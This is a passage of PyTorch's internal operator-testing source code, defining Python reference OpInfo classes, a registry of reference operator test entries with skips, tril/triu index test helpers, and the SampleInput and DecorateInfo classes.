torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) self.validate_view_consistency = validate_view_consistency assert isinstance(self.torch_opinfo, OpInfo) inherited = self.torch_opinfo._original_opinfo_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(PythonRefInfo, self).__init__(**ukwargs) class ReductionPythonRefInfo(ReductionOpInfo): ''' An OpInfo for a Python reference of an elementwise unary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, ReductionOpInfo) inherited = self.torch_opinfo._original_reduction_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) # See https://github.com/pytorch/pytorch/issues/77216 self.validate_view_consistency = False super().__init__(**ukwargs) class ElementwiseUnaryPythonRefInfo(UnaryUfuncInfo): ''' An OpInfo for a Python reference of an elementwise unary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, UnaryUfuncInfo) inherited = self.torch_opinfo._original_unary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseUnaryPythonRefInfo, self).__init__(**ukwargs) class ElementwiseBinaryPythonRefInfo(BinaryUfuncInfo): ''' An OpInfo for a Python reference of an elementwise binary operation. ''' def __init__( self, name, # the stringname of the callable Python reference *, op=None, # the function variant of the operation, populated as torch.<name> if None torch_opinfo_name, # the string name of the corresponding torch opinfo **kwargs): # additional kwargs override kwargs inherited from the torch opinfo self.torch_opinfo_name = torch_opinfo_name self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name) assert isinstance(self.torch_opinfo, BinaryUfuncInfo) inherited = self.torch_opinfo._original_binary_ufunc_args ukwargs = _inherit_constructor_args(name, op, inherited, kwargs) super(ElementwiseBinaryPythonRefInfo, self).__init__(**ukwargs) # Separate registry for experimental Python Reference OpInfos. python_ref_db = [ # # Elementwise Unary OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.abs", torch_opinfo_name="abs", ), ElementwiseUnaryPythonRefInfo( "_refs.acos", torch_opinfo_name="acos", ), ElementwiseUnaryPythonRefInfo( "_refs.acosh", torch_opinfo_name="acosh", ), ElementwiseUnaryPythonRefInfo( "_refs.asin", torch_opinfo_name="asin", ), ElementwiseUnaryPythonRefInfo( "_refs.atan", torch_opinfo_name="atan", ), ElementwiseUnaryPythonRefInfo( "_refs.bitwise_not", torch_opinfo_name="bitwise_not", ), ElementwiseUnaryPythonRefInfo( "_refs.ceil", torch_opinfo_name="ceil", ), ElementwiseUnaryPythonRefInfo( "_refs.cos", torch_opinfo_name="cos", ), ElementwiseUnaryPythonRefInfo( "_refs.cosh", torch_opinfo_name="cosh", ), ElementwiseUnaryPythonRefInfo( "_refs.digamma", torch_opinfo_name="digamma", ), ElementwiseUnaryPythonRefInfo( "_refs.erf", torch_opinfo_name="erf", ), ElementwiseUnaryPythonRefInfo( "_refs.erfinv", torch_opinfo_name="erfinv", ), ElementwiseUnaryPythonRefInfo( "_refs.erfc", torch_opinfo_name="erfc", ), ElementwiseUnaryPythonRefInfo( "_refs.exp", torch_opinfo_name="exp", ), ElementwiseUnaryPythonRefInfo( "_refs.expm1", torch_opinfo_name="expm1", ), ElementwiseUnaryPythonRefInfo( "_refs.exp2", torch_opinfo_name="exp2", ), ElementwiseUnaryPythonRefInfo( "_refs.fill", torch_opinfo_name="fill", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.floor", torch_opinfo_name="floor", ), ElementwiseUnaryPythonRefInfo( "_refs.frac", torch_opinfo_name="frac", ), ElementwiseUnaryPythonRefInfo( "_refs.isfinite", torch_opinfo_name="isfinite", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isinf", torch_opinfo_name="isinf", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.isnan", torch_opinfo_name="isnan", supports_out=True, ), ElementwiseUnaryPythonRefInfo( "_refs.i0", torch_opinfo_name="i0", ), ElementwiseUnaryPythonRefInfo( "_refs.lgamma", torch_opinfo_name="lgamma", ), ElementwiseUnaryPythonRefInfo( "_refs.log", torch_opinfo_name="log", ), ElementwiseUnaryPythonRefInfo( "_refs.log1p", torch_opinfo_name="log1p", ), ElementwiseUnaryPythonRefInfo( "_refs.log10", torch_opinfo_name="log10", ), ElementwiseUnaryPythonRefInfo( "_refs.log2", torch_opinfo_name="log2", ), ElementwiseUnaryPythonRefInfo( "_refs.nan_to_num", torch_opinfo_name="nan_to_num", ), ElementwiseUnaryPythonRefInfo( "_refs.neg", torch_opinfo_name="neg", ), ElementwiseUnaryPythonRefInfo( "_refs.positive", torch_opinfo_name="positive", ), ElementwiseUnaryPythonRefInfo( "_refs.reciprocal", torch_opinfo_name="reciprocal", ), ElementwiseUnaryPythonRefInfo( "_refs.round", torch_opinfo_name="round", ), ElementwiseUnaryPythonRefInfo( "_refs.sigmoid", torch_opinfo_name="sigmoid", # Reference: https://github.com/pytorch/pytorch/issues/56012 handles_complex_extremal_values=False, handles_large_floats=False, ), ElementwiseUnaryPythonRefInfo( "_refs.sign", torch_opinfo_name="sign", ), ElementwiseUnaryPythonRefInfo( "_refs.signbit", torch_opinfo_name="signbit", ), ElementwiseUnaryPythonRefInfo( "_refs.sin", torch_opinfo_name="sin", ), ElementwiseUnaryPythonRefInfo( "_refs.sinh", torch_opinfo_name="sinh", ), ElementwiseUnaryPythonRefInfo( "_refs.sqrt", torch_opinfo_name="sqrt", ), ElementwiseUnaryPythonRefInfo( "_refs.square", torch_opinfo_name="square", ), ElementwiseUnaryPythonRefInfo( "_refs.tan", torch_opinfo_name="tan", ), ElementwiseUnaryPythonRefInfo( "_refs.tanh", torch_opinfo_name="tanh", ), # # Elementwise Unary Special OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.special.i0e", torch_opinfo_name="special.i0e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1", torch_opinfo_name="special.i1", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1e", torch_opinfo_name="special.i1e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.logit", torch_opinfo_name="logit", ), # # Elementwise Unary nn.functional OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.celu", torch_opinfo_name="nn.functional.celu", ), PythonRefInfo( "_refs.nn.functional.dropout", torch_opinfo_name="nn.functional.dropout", decorators=( DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_view'), ) ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.elu", torch_opinfo_name="nn.functional.elu", ), PythonRefInfo( "_refs.nn.functional.leaky_relu", torch_opinfo_name="nn.functional.leaky_relu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.relu", torch_opinfo_name="nn.functional.relu", decorators=( # Need FakeTensor support for meta coverage DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_meta',), ), ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.mish", torch_opinfo_name="nn.functional.mish", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.selu", torch_opinfo_name="nn.functional.selu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.softplus", torch_opinfo_name="nn.functional.softplus", ), PythonRefInfo( "_refs.nn.functional.margin_ranking_loss", torch_opinfo_name="nn.functional.margin_ranking_loss", ), PythonRefInfo( "_refs.nn.functional.hinge_embedding_loss", torch_opinfo_name="nn.functional.hinge_embedding_loss", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.tanhshrink", torch_opinfo_name="nn.functional.tanhshrink", ), # # Elementwise Binary Reference OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.add", torch_opinfo_name="add", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.atan2", torch_opinfo_name="atan2", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_and", torch_opinfo_name="bitwise_and", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_left_shift", torch_opinfo_name="bitwise_left_shift", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_or", torch_opinfo_name="bitwise_or", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_xor", torch_opinfo_name="bitwise_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.eq", torch_opinfo_name="eq", ), ElementwiseBinaryPythonRefInfo( "_refs.float_power", torch_opinfo_name="float_power", skips=( # Test doesn't account for float -> double type promotion DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ) ), ElementwiseBinaryPythonRefInfo( "_refs.fmax", torch_opinfo_name="fmax", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmin", torch_opinfo_name="fmin", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmod", torch_opinfo_name="fmod", rhs_make_tensor_kwargs={'exclude_zero': True}, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref', dtypes=(torch.bfloat16,), device_type='cpu'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref_torch_fallback', dtypes=(torch.bfloat16,), device_type='cpu'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.ge", torch_opinfo_name="ge", ), ElementwiseBinaryPythonRefInfo( "_refs.gt", torch_opinfo_name="gt", ), ElementwiseBinaryPythonRefInfo( "_refs.igamma", torch_opinfo_name="igamma", ), ElementwiseBinaryPythonRefInfo( "_refs.igammac", torch_opinfo_name="igammac", ), ElementwiseBinaryPythonRefInfo( "_refs.isclose", torch_opinfo_name="isclose", skips=( # Intentional xfail -- isclose does not type promote DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.le", torch_opinfo_name="le", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_and", torch_opinfo_name="logical_and", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_or", torch_opinfo_name="logical_or", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_xor", torch_opinfo_name="logical_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.lt", torch_opinfo_name="lt", ), ElementwiseBinaryPythonRefInfo( "_refs.maximum", torch_opinfo_name="maximum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.minimum", torch_opinfo_name="minimum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.mul", torch_opinfo_name="mul", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.ne", torch_opinfo_name="ne", ), ElementwiseBinaryPythonRefInfo( "_refs.nextafter", torch_opinfo_name="nextafter", ), ElementwiseBinaryPythonRefInfo( "_refs.pow", torch_opinfo_name="pow", ), ElementwiseBinaryPythonRefInfo( "_refs.sub", torch_opinfo_name="sub", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.true_divide", torch_opinfo_name="true_divide", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), # # Elementwise Binary Special OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.special.zeta", torch_opinfo_name="special.zeta", supports_one_python_scalar=True, ), # # Elementwise Ternary Reference OpInfos # PythonRefInfo( "_refs.clamp", torch_opinfo_name="clamp", ), # # Data Conversion & Data Movement Opinfos # PythonRefInfo( "_refs.clone", torch_opinfo_name="clone", ), # # View & Shape OpInfos # PythonRefInfo( "_refs.atleast_1d", torch_opinfo_name="atleast_1d", ), PythonRefInfo( "_refs.atleast_2d", torch_opinfo_name="atleast_2d", ), PythonRefInfo( "_refs.atleast_3d", torch_opinfo_name="atleast_3d", ), PythonRefInfo( "_refs.as_strided", torch_opinfo_name="as_strided", # FIXME: doesn't support chalf dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # TODO: fix and/or update to xfails DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_python_ref_meta'), # cloned_mutable_input.is_same(returned_output) INTERNAL ASSERT FAILED DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_conj_view'), ), ), PythonRefInfo( "_refs.broadcast_shapes", torch_opinfo_name="broadcast_shapes", ), PythonRefInfo( "_refs.broadcast_tensors", torch_opinfo_name="broadcast_tensors", ), PythonRefInfo( "_refs.broadcast_to", torch_opinfo_name="broadcast_to", ), PythonRefInfo( "_refs.cat", torch_opinfo_name="cat", ), PythonRefInfo( "_refs.chunk", torch_opinfo_name="chunk", ), PythonRefInfo( "_refs.column_stack", torch_opinfo_name="column_stack", ), PythonRefInfo( "_refs.dsplit", torch_opinfo_name="dsplit", ), PythonRefInfo( "_refs.dstack", torch_opinfo_name="dstack", ), PythonRefInfo( "_refs.flatten", torch_opinfo_name="flatten", ), PythonRefInfo( "_refs.flip", torch_opinfo_name="flip", ), PythonRefInfo( "_refs.fliplr", torch_opinfo_name="fliplr", ), PythonRefInfo( "_refs.flipud", torch_opinfo_name="flipud", ), PythonRefInfo( "_refs.narrow", torch_opinfo_name="narrow", ), PythonRefInfo( "_refs.permute", torch_opinfo_name="permute", ), PythonRefInfo( "_refs.reshape", torch_opinfo_name="reshape", ), PythonRefInfo( "_refs.roll", torch_opinfo_name="roll", validate_view_consistency=False, ), PythonRefInfo( "_refs.rot90", torch_opinfo_name="rot90", validate_view_consistency=False, ), PythonRefInfo( "_refs.stack", torch_opinfo_name="stack", ), PythonRefInfo( "_refs.squeeze", torch_opinfo_name="squeeze", ), PythonRefInfo( "_refs.tensor_split", torch_opinfo_name="tensor_split", skips=( # TensorMeta doesn't support tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_meta'), # RuntimeError: no _refs support for torch.Tensor.tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref'), ) ), PythonRefInfo( "_refs.transpose", torch_opinfo_name="transpose", ), PythonRefInfo( "_refs.t", torch_opinfo_name="t", ), PythonRefInfo( "_refs.unsqueeze", torch_opinfo_name="unsqueeze", ), PythonRefInfo( "_refs.view", torch_opinfo_name="view", ), # # Reduction Reference OpInfos # ReductionPythonRefInfo( "_refs.all", torch_opinfo_name="all", ), ReductionPythonRefInfo( "_refs.amax", torch_opinfo_name="amax", ), ReductionPythonRefInfo( "_refs.amin", torch_opinfo_name="amin", ), ReductionPythonRefInfo( "_refs.any", torch_opinfo_name="any", ), ReductionPythonRefInfo( "_refs.mean", torch_opinfo_name="mean", supports_out=True, ), ReductionPythonRefInfo( "_refs.std", torch_opinfo_name="std", supports_out=True ), # std_mean and var_mean are not ReductionInfos PythonRefInfo( "_refs.std_mean", torch_opinfo_name="std_mean", validate_view_consistency=False ), ReductionPythonRefInfo( "_refs.sum", torch_opinfo_name="sum", supports_out=True, ), ReductionPythonRefInfo( "_refs.prod", torch_opinfo_name="prod", supports_out=True, ), ReductionPythonRefInfo( "_refs.var", torch_opinfo_name="var", supports_out=True ), PythonRefInfo( "_refs.var_mean", torch_opinfo_name="var_mean", validate_view_consistency=False ), # # Linear Algebra Operators # PythonRefInfo( "_refs.addr", torch_opinfo_name="addr", decorators=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref',), ), ), # # Tensor Creation Reference OpInfos # PythonRefInfo( "_refs.empty", torch_opinfo_name="empty", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), PythonRefInfo( "_refs.empty_like", torch_opinfo_name="empty_like", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), # # Conditional Reference OpInfos # PythonRefInfo( "_refs.where", torch_opinfo_name="where", op=lambda self, condition, other: refs.where(condition, self, other), ), ] # Common operator groupings ops_and_refs = op_db + python_ref_db unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo)] binary_ufuncs = [op for op in op_db if isinstance(op, BinaryUfuncInfo)] binary_ufuncs_and_refs = tuple(op for op in ops_and_refs if isinstance(op, BinaryUfuncInfo)) spectral_funcs = [op for op in op_db if isinstance(op, SpectralFuncInfo)] sparse_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse] sparse_csr_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse_csr] sparse_reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo) and op.supports_sparse] shape_funcs = [op for op in op_db if isinstance(op, ShapeFuncInfo)] reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo)] reference_filtered_ops = [op for op in reduction_ops if op.ref not in (_NOTHING, None)] reference_masked_ops = [op for op in reference_filtered_ops if op.name.startswith('_masked.')] sparse_masked_reduction_ops = [op for op in sparse_reduction_ops if op.name.startswith('_masked.')] # TODO: review porting these to make_tensor def index_variable(shape, max_indices, device=torch.device('cpu')): if not isinstance(shape, tuple): shape = (shape,) index = torch.rand(*shape, dtype=torch.double, device=device).mul_(max_indices).floor_().long() return index def gather_variable(shape, index_dim, max_indices, duplicate=False, device=torch.device('cpu')): assert len(shape) == 2 assert index_dim < 2 batch_dim = 1 - index_dim index = torch.zeros(*shape, dtype=torch.long, device=device) for i in range(shape[index_dim]): index.select(index_dim, i).copy_( torch.randperm(max_indices, device=device)[:shape[batch_dim]]) if duplicate: index.select(batch_dim, 0).copy_(index.select(batch_dim, 1)) return index def bernoulli_scalar(): return torch.tensor(0, dtype=torch.bool).bernoulli_() def mask_not_all_zeros(shape): assert len(shape) > 0 while True: result = torch.randn(shape).gt(0) if result.sum() > 0: return result # TODO: move all tri/tril/triu testing to tensor creation op test suite and remove # these from here def _compare_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): if row == 0 or col == 0: # have to handle this separately as tril and triu does not take # empty matrix as input self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) else: # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .tril(offset).nonzero().to(dtype).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .triu(offset).nonzero().to(dtype).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) def _compare_large_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): l = torch.ones(row, col, dtype=dtype, device='cpu').tril(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.tril_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() l = torch.ones(row, col, dtype=dtype, device='cpu').triu(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.triu_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() # ( # row # col # offset (optional) # dtype (optional) # ) tri_tests_args = [ (1, 1), (3, 3), (3, 3, 1), (3, 3, 2), (3, 3, 200), (3, 3, -1), (3, 3, -2), (3, 3, -200), (0, 3, 0), (0, 3, 1), (0, 3, -1), (0, 1, 2), (1, 0, 2), (3, 0, 0), (3, 0, 1), (3, 0, -1), (0, 0, 0), (0, 0, 1), (0, 0, -1), (3, 6, 0), (3, 6, 1), (3, 6, 3), (3, 6, 9), (3, 6, -1), (3, 6, -3), (3, 6, -9), (6, 3, 0), (6, 3, 1), (6, 3, 3), (6, 3, 9), (6, 3, -1), (6, 3, -3), (6, 3, -9), (258, 253, 1, torch.float32), (257, 258, 1, torch.float64), (258, 258, 1, torch.short), (3, 513, 1, torch.long), (513, 3, 1, torch.int), (513, 0, 1, torch.double), (1024, 1024), (1024, 1024, 500, torch.float32), (1024, 1024, 1023), (1024, 1024, -500), (1023, 1025), (1025, 1023, 1022), (1024, 1024, -500), (3, 2028), (3, 2028, 1), (3, 2028, -1), (2028, 3), (2028, 1), (2028, 1, -1) ] tri_large_tests_args: List[Tuple[int, ...]] = [ # Large test cases below are deliberately commented out to speed up CI # tests and to avoid OOM error. When modifying implementations of # tril_indices and triu_indices, please enable these tests and make sure # they pass. # # (1, 268435455), # (5000, 5000), # (10000, 10000), # (268435455, 1), # (134217727, 2, 1), # (2, 134217727, 1), # (536870901, 1), # (1, 536870901), # (268435455, 2, 1), # (2, 268435455, 1) ] def run_additional_tri_tests(self, device): x = torch.ones( 3, 3, dtype=torch.long, device=device, layout=torch.strided) l = x.tril(0).nonzero().transpose(0, 1) u = x.triu(0).nonzero().transpose(0, 1) self.assertEqual(l, torch.tril_indices(3, 3, device=device)) self.assertEqual( l, torch.tril_indices(3, 3, device=device, layout=torch.strided)) self.assertEqual(u, torch.triu_indices(3, 3, device=device)) self.assertEqual( u, torch.triu_indices(3, 3, device=device, layout=torch.strided)) self.assertRaises( RuntimeError, lambda: torch.triu_indices( 1, 1, device=device, layout=torch.sparse_coo)) self.assertRaises( RuntimeError, lambda: torch.tril_indices( 1, 1, device=device, layout=torch.sparse_coo))
from functools import wraps, partial from itertools import product, chain, islice import itertools import collections import copy from enum import Enum import operator import random import unittest import math import torch import numpy as np from torch._six import inf import collections.abc from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union, Iterable from dataclasses import dataclass, asdict from torchgen.utils import dataclass_repr from torch.testing import make_tensor from torch.testing._internal.common_dtype import ( _dispatch_dtypes, floating_types, floating_types_and, complex_types, floating_and_complex_types, floating_and_complex_types_and, all_types_and_complex_and, all_types_and, all_types_and_complex, integral_types_and, all_types, double_types, empty_types, complex_types_and, integral_types ) from torch.testing._internal.common_device_type import \ (onlyCUDA, onlyNativeDeviceTypes, disablecuDNN, skipCUDAIfNoMagma, skipCUDAIfNoMagmaAndNoCusolver, skipCUDAIfNoCusolver, skipCPUIfNoLapack, skipCPUIfNoFFT, skipCUDAIfRocm, skipCUDAIf, precisionOverride, skipCPUIfNoMklSparse, toleranceOverride, tol, has_cusolver) from torch.testing._internal.common_cuda import ( CUDA11OrLater, SM53OrLater, SM60OrLater, with_tf32_off, TEST_CUDNN, _get_torch_cuda_version, _get_magma_version) from torch.testing._internal.common_utils import \ (is_iterable_of_tensors, random_symmetric_matrix, random_symmetric_psd_matrix, make_fullrank_matrices_with_distinct_singular_values, random_symmetric_pd_matrix, make_symmetric_matrices, make_symmetric_pd_matrices, random_square_matrix_of_rank, TEST_WITH_ROCM, IS_WINDOWS, IS_MACOS, TEST_SCIPY, torch_to_numpy_dtype_dict, TEST_WITH_ASAN, GRADCHECK_NONDET_TOL, slowTest, noncontiguous_like, freeze_rng_state) import torch.testing._internal.opinfo_helper as opinfo_helper import torch._refs as refs # noqa: F401 import torch._refs.nn.functional import torch._refs.special import torch._prims as prims # noqa: F401 from torch.utils._pytree import tree_flatten from distutils.version import LooseVersion has_scipy_fft = False if TEST_SCIPY: from scipy import stats import scipy.spatial import scipy.special try: import scipy.fft has_scipy_fft = True except ModuleNotFoundError: pass # Reasonable testing sizes for dimensions L = 20 M = 10 S = 5 # Unique value to distinguish default from anything else _NOTHING = object() class DecorateInfo(object): """Describes which test, or type of tests, should be wrapped in the given decorators when testing an operator. Any test that matches all provided arguments will be decorated. The decorators will only be applied if the active_if argument is True.""" __slots__ = ['decorators', 'cls_name', 'test_name', 'device_type', 'dtypes', 'active_if'] def __init__(self, decorators, cls_name=None, test_name=None, *, device_type=None, dtypes=None, active_if=True): self.decorators = list(decorators) if isinstance(decorators, collections.abc.Sequence) else [decorators] self.cls_name = cls_name self.test_name = test_name self.device_type = device_type self.dtypes = dtypes self.active_if = active_if # Validate dtypes if self.dtypes is not None: for dtype in self.dtypes: assert isinstance(dtype, torch.dtype) def is_active(self, cls_name, test_name, device_type, dtype): return ( self.active_if and (self.cls_name is None or self.cls_name == cls_name) and (self.test_name is None or self.test_name == test_name) and (self.device_type is None or self.device_type == device_type) and (self.dtypes is None or dtype in self.dtypes) ) # FIXME # Note: historically the 'input' kwarg had to be a Tensor or TensorList, but we are trying # to support scalar inputs, too. Some tests still depend on 'input' being a Tensor # or TensorList, however. class SampleInput(object): """Represents sample inputs to a function.""" __slots__ = ['input', 'args', 'kwargs', 'output_process_fn_grad', 'broadcasts_input', 'name'] def __init__(self, input, *, args=tuple(), kwargs=None, output_process_fn_grad=lambda x: x, broadcasts_input=False, name=""): # input is the first input to the op and is typically either a Tensor or TensorList (Sequence[Tensor]). # This follows the typical pattern where for Tensor inputs op(t, ...) = t.op(...). self.input = input self.args = args self.kwargs = kwargs if kwargs is not None else {} self.output_process_fn_grad = output_process_fn_grad self.name = name # Specifies if `self.input` is broadcasted or not, # given that the operator supports broadcasting. # This field is used to verify the behavior for inplace variant. # # If a SampleInput is marked with `broadcasts_input=True`, # it is verified that we get a `RuntimerError` with this sample, # and inplace variant. Also inplace grad{grad} tests are skipped, # for such inputs (as they will error out otherwise). self.broadcasts_input = broadcasts_input def _repr_helper(self, formatter): # Helper function to return the details of the SampleInput as `str` # It consolidates all the fields of SampleInput and allows, # formatting the fields like `input`, `args`, etc with `formatter` # callable to customize the representation. # Look at `summary` method for example. arguments = [ f'input={formatter(self.input)}', f'args={formatter(self.args)}', f'kwargs={formatter(self.kwargs)}', f'output_process_fn_grad={self.output_process_fn_grad}', f'broadcasts_input={self.broadcasts_input}', f'name={repr(self.name)}'] return f'SampleInput({", ".join(a for a in arguments if a is not None)})' def __repr__(self): return self._repr_helper(lambda x: x) def summary(self): # Returns the SampleInput details in a more # friendly format. # It formats `Tensor` and `TensorList` # in a more condensed representation. def formatter(arg): # Format any instance of `Tensor` (standalone, in list, or in dict) # by Tensor[TensorShape] # Eg. Tensor with shape (3, 4) is formatted as Tensor[3, 4] if isinstance(arg, torch.Tensor): shape = str(tuple(arg.shape)).replace('(', '').replace(')', '') return f"Tensor[{shape}]" elif isinstance(arg, dict): return {k: formatter(v) for k, v in arg.items()} elif is_iterable_of_tensors(arg): return "TensorList[" + ", ".join(map(formatter, arg)) + "]" elif isinstance(arg, (list, tuple)): # Handle list, tuple return "(" + ",".join(map(formatter, arg)) + ")" return repr(arg) return self._repr_helper(formatter) # Applies the transform f(t) -> t to each tensor and dtype in the SampleInput def transform(self, f): def tt(t): def _tt(t): with torch.no_grad(): return f(t) if isinstance(t, torch.Tensor): return _tt(t) elif isinstance(t, torch.dtype): return _tt(t) elif isinstance(t, list): return list(map(tt, t)) elif isinstance(t, tuple): return tuple(map(tt, 